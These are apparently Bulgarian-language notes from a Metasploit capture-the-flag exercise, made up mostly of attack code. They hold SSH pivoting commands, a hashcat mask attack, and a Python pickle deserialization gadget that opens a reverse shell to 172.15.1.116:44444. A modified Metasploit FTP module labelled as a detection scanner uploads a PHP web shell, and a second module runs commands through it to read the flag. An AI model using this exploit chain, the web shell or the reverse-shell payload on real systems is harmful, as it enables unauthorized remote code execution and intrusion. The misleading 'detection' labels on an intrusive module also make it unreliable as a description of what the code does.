# Полезни команди
`sshuttle -vvv -e 'ssh -i ./metasploit_ctf_kali_ssh_key.pem' -r kali@34.227.205.13 -x 34.227.205.13 172.15.1.117/32`
`ssh -i metasploit_ctf_kali_ssh_key.pem -Nf -D 127.0.0.1:9050 kali@34.227.205.13`
Noob хашкотка:
`hashcat -m 0 pass_to_crack.txt -a 3 ihatesalt?1?1?1?1?1?1 -i --increment-min 9 --increment-max 15 -1 ?l?d --force -O`
Port 8888 > cookie deserialization vuln:
```
import pickle
import base64
import os
class RCE:
    """Pickle gadget aimed at the cookie-deserialization service on port 8888.

    ``pickle.loads`` rebuilds an object by calling whatever ``__reduce__``
    returns (a callable plus its argument tuple), so a service that unpickles
    an attacker-supplied cookie ends up calling ``os.system`` with ``cmd``.
    Defensive takeaway: never unpickle untrusted input; keep cookie state in
    JSON and sign it (HMAC) so tampering is detected before it is parsed.
    """

    def __reduce__(self):
        # The command the *server* runs while unpickling: a python one-liner
        # that connects back to 172.15.1.116:44444 and attaches a shell to it.
        # The string is kept at column 0 because its leading/trailing
        # newlines are part of the value.
        cmd = """
python -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.15.1.116",44444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
"""
        # (callable, args): pickle encodes this as a call to os.system(cmd).
        return os.system, (cmd,)
# Serialize the gadget and base64 it so it can be pasted as the cookie value.
# NOTE(review): the cookie format (plain base64 pickle, no signature) is
# inferred from the note above — confirm against the service.
pickled = pickle.dumps(RCE())
# On Python 3 this prints the bytes repr (b'...'); drop the b'' wrapper when pasting.
print(base64.b64encode(pickled))
```
порт 8101
за upload на "test.php", което да послужи после за rce през ftp-то
```
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Ftp
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  # Rapid7's anonymous-FTP scanner with one CTF-specific change: when the
  # login succeeds and the `files` directory is enterable, run_host also
  # tries to drop `test.php` there. The metadata below still describes the
  # stock detection module, so Name/Description are misleading for this copy.
  def initialize
    super(
      'Name' => 'Anonymous FTP Access Detection',
      'Description' => 'Detect anonymous (read/write) FTP server access.',
      'References' =>
        [
          ['URL', 'http://en.wikipedia.org/wiki/File_Transfer_Protocol#Anonymous_FTP'],
        ],
      'Author' => 'Matteo Cantoni <goony[at]nothink.org>',
      'License' => MSF_LICENSE
    )

    # FTPUSER/FTPPASS are provided by the Ftp mixin; the resource script on
    # this page sets both to `ftpuser`, so "Anonymous" in the output below is
    # a misnomer for this setup.
    register_options(
      [
        Opt::RPORT(21),
      ])
  end

  # Scanner callback, called once per host: logs in, probes whether `files`
  # is enterable, attempts an upload on success, and records the credential
  # either way.
  # @param target_host [String] address handed in by the Scanner mixin
  def run_host(target_host)
    begin
      # connect_login(global, verbose) from the Ftp mixin — presumably truthy
      # on a successful login; verify against the mixin.
      res = connect_login(true, false)
      banner.strip! if banner
      dir = Rex::Text.rand_text_alpha(8) # NOTE(review): assigned but never used
      # Base64 of a one-line PHP file that executes the `e` GET parameter;
      # the HTTP module further down calls it with `?e=`.
      data = Base64.decode64('PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImUiXSk7ID8+Cg==')
      if res
        #write_check = send_cmd(['cd', files] , true)
        # CWD into `files`; a 2xx reply is treated as "writable", although CWD
        # only proves the directory exists and is enterable.
        write_check = send_cmd( ["CWD", 'files'], true )
        #raw_send_recv('DIR')
        #raw_send_recv('PWD')
        if write_check && write_check =~ /^2/
          # Attempts to upload test.php to the target: an intrusive write,
          # not a detection, despite the module's name.
          send_cmd_data(["PUT", "test.php"], data, "I")
          print_good("#{target_host}:#{rport} - Anonymous READ/WRITE (#{banner})")
          access_type = 'Read/Write'
        else
          print_good("#{target_host}:#{rport} - Anonymous READ (#{banner})")
          access_type = 'Read-only'
        end
        register_creds(target_host, access_type)
      end
      # NOTE(review): skipped when anything above raises; an `ensure` would
      # close the control connection on every path.
      disconnect
    rescue ::Interrupt
      # Let Ctrl-C propagate ($ERROR_INFO is the English-lib alias of $!).
      raise $ERROR_INFO
    rescue ::Rex::ConnectionError, ::IOError
      # Deliberate best-effort: unreachable or hung hosts are skipped silently.
    end
  end

  # Records the successful login in the database via the Report mixin.
  # @param target_host [String] host the login succeeded against
  # @param access_type [String] 'Read/Write' or 'Read-only', stored as access_level
  def register_creds(target_host, access_type)
    # Build service information
    service_data = {
      address: target_host,
      port: datastore['RPORT'],
      service_name: 'ftp',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    # Build credential information
    credential_data = {
      origin_type: :service,
      module_fullname: self.fullname,
      private_data: datastore['FTPPASS'],
      private_type: :password,
      username: datastore['FTPUSER'],
      workspace_id: myworkspace_id
    }

    credential_data.merge!(service_data)
    credential_core = create_credential(credential_data)

    # Assemble the options hash for creating the Metasploit::Credential::Login object
    login_data = {
      access_level: access_type,
      core: credential_core,
      last_attempted_at: DateTime.now,
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
      workspace_id: myworkspace_id
    }

    login_data.merge!(service_data)
    create_credential_login(login_data)
  end
end
```
и resource скрипта с него
```
# The module is copied to `modules/exploits/`, so don't change this
# NOTE(review): the class on this page is an Msf::Auxiliary; confirm the
# loader accepts it from the exploits directory (the type comes from the path).
use exploit/module
# Do your datastore initialization here
# e.g.:
# set USERNAME foo
# set payload ...
# Credentials for the Ftp mixin (override its anonymous defaults); the module
# still labels the result "Anonymous" in its output.
set FTPUSER ftpuser
set FTPPASS ftpuser
# Make sure everything is alright
show options
# this will execute the module and put any session in background
run -z
# This block of ruby code is useful to make sure a session is setup before
# interacting with it. Feel free to update this code.
# NOTE(review): the FTP module on this page never opens a session, so the
# wait below is expected to run out its 10 iterations and do nothing.
<ruby>
print_status('Waiting a bit to make sure the session is completely setup...')
# Poll once per second, at most `timeout` times, for a session that answers
# `.sys` (presumably a meterpreter session with stdapi loaded; a plain shell
# session would likely raise NoMethodError here — confirm before relying on it).
timeout = 10
loop do
  break if (timeout == 0) || (framework.sessions.any? && framework.sessions.first[1].sys)
  sleep 1
  timeout -= 1
end
if framework.sessions.any? && framework.sessions.first[1].sys
  # Here is where we can interact with the session (shell or meterpreter).
  # The session number should be 1 at this point.
  # e.g. (for a meterpreter session):
  # run_single("sessions -i 1 -C 'ls'")
  # run_single("sessions -i 1 -C 'cat /etc/passwd'")
end
</ruby>
```
за rce-то
като модул скрипт
```
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Ftp
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  # NOTE(review): Ftp and HttpClient each bring their own connection helpers;
  # with both included, the later include wins for any clashing names. Only
  # the HTTP side is used by run_host below — confirm nothing from Ftp is needed.
  include Msf::Exploit::Remote::HttpClient

  # HTTP follow-up to the FTP upload on this page: requests the dropped PHP
  # file and asks it to read the flag file. Name/Description/References were
  # left over from the FTP scanner template and do not describe this module.
  def initialize
    super(
      'Name' => 'Anonymous FTP Access Detection',
      'Description' => 'Detect anonymous (read/write) FTP server access.',
      'References' =>
        [
          ['URL', 'http://en.wikipedia.org/wiki/File_Transfer_Protocol#Anonymous_FTP'],
        ],
      'Author' => 'Matteo Cantoni <goony[at]nothink.org>',
      'License' => MSF_LICENSE
    )

    register_options(
      [
        Opt::RPORT(80),
        # 'Example Application' is template text; the resource script on this
        # page sets TARGETURI to files/test.php (the file uploaded over FTP).
        OptString.new('TARGETURI', [ true, 'The URI of the Example Application', '/example/'])
      ])
  end

  # Scanner callback, called once per host: issues one GET, aborts the module
  # (fail_with) on no response or a 404, and prints the body only when
  # VERBOSE is set.
  # @param target_host [String] address handed in by the Scanner mixin; not
  #   used directly here — HttpClient reads RHOST/RPORT from the datastore
  def run_host(target_host)
    begin
      # Path is built from TARGETURI, 'index.php' and the literal query string;
      # the query asks the PHP file's `e` parameter to base64 /var/www/5_of_clubs*.
      res = send_request_cgi(
        'uri' => normalize_uri(target_uri.path, 'index.php', '?e=cat+/var/www/5_of_clubs*|base64'),
        'method' => 'GET'
      )
      # fail_with raises, so res is non-nil past this line.
      fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
      if res && res.code == 200
        # Only shown with VERBOSE=true; the response body (the base64 output)
        # is printed inline right after "Found".
        vprint_status("#{peer} - Works! (response code: Found#{res.body})")
      end
      if res && res.code == 404
        fail_with(Failure::UnexpectedReply, "#{peer} - Check target uri:error code #{res.code}")
      end
    rescue ::Rex::ConnectionError
      # Re-raised, so an unreachable host aborts the scan instead of being
      # skipped (the FTP module on this page does the opposite).
      raise $ERROR_INFO
    rescue ::Rex::ConnectionError, ::IOError
      # NOTE(review): ::Rex::ConnectionError is already taken by the clause
      # above, so this clause only ever swallows ::IOError.
    end
  end

  # Carried over from the FTP scanner: nothing in this module calls it, and if
  # it were called it would record an 'ftp' service on RPORT (80 here) using
  # the Ftp mixin's FTPUSER/FTPPASS options.
  # @param target_host [String] host to attach the credential to
  # @param access_type [String] value stored as the login's access_level
  def register_creds(target_host, access_type)
    # Build service information
    service_data = {
      address: target_host,
      port: datastore['RPORT'],
      service_name: 'ftp',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    # Build credential information
    credential_data = {
      origin_type: :service,
      module_fullname: self.fullname,
      private_data: datastore['FTPPASS'],
      private_type: :password,
      username: datastore['FTPUSER'],
      workspace_id: myworkspace_id
    }

    credential_data.merge!(service_data)
    credential_core = create_credential(credential_data)

    # Assemble the options hash for creating the Metasploit::Credential::Login object
    login_data = {
      access_level: access_type,
      core: credential_core,
      last_attempted_at: DateTime.now,
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
      workspace_id: myworkspace_id
    }

    login_data.merge!(service_data)
    create_credential_login(login_data)
  end
end
```
като ресурс файл
```
# The module is copied to `modules/exploits/`, so don't change this
# NOTE(review): the HTTP class on this page is an Msf::Auxiliary; confirm the
# loader accepts it from the exploits directory (the type comes from the path).
use exploit/module
# Do your datastore initialization here
# e.g.:
# set USERNAME foo
# set payload ...
# TARGETURI is the PHP file dropped by the FTP module; the commented line
# below is an alternative base path that was tried.
set TARGETURI files/test.php
#set TARGETURI index.php
# Make sure everything is alright
show options
# this will execute the module and put any session in background
run -z
# This block of ruby code is useful to make sure a session is setup before
# interacting with it. Feel free to update this code.
# NOTE(review): the HTTP module only prints the response and never opens a
# session, so the wait below is expected to time out after 10 iterations.
<ruby>
print_status('Waiting a bit to make sure the session is completely setup...')
# Poll once per second, at most `timeout` times, for a session that answers
# `.sys` (presumably a meterpreter session with stdapi loaded; a plain shell
# session would likely raise NoMethodError here — confirm before relying on it).
timeout = 10
loop do
  break if (timeout == 0) || (framework.sessions.any? && framework.sessions.first[1].sys)
  sleep 1
  timeout -= 1
end
if framework.sessions.any? && framework.sessions.first[1].sys
  # Here is where we can interact with the session (shell or meterpreter).
  # The session number should be 1 at this point.
  # e.g. (for a meterpreter session):
  # run_single("sessions -i 1 -C 'ls'")
  # run_single("sessions -i 1 -C 'cat /etc/passwd'")
end
</ruby>
```
флага е в /var/www/5_of_clubs.png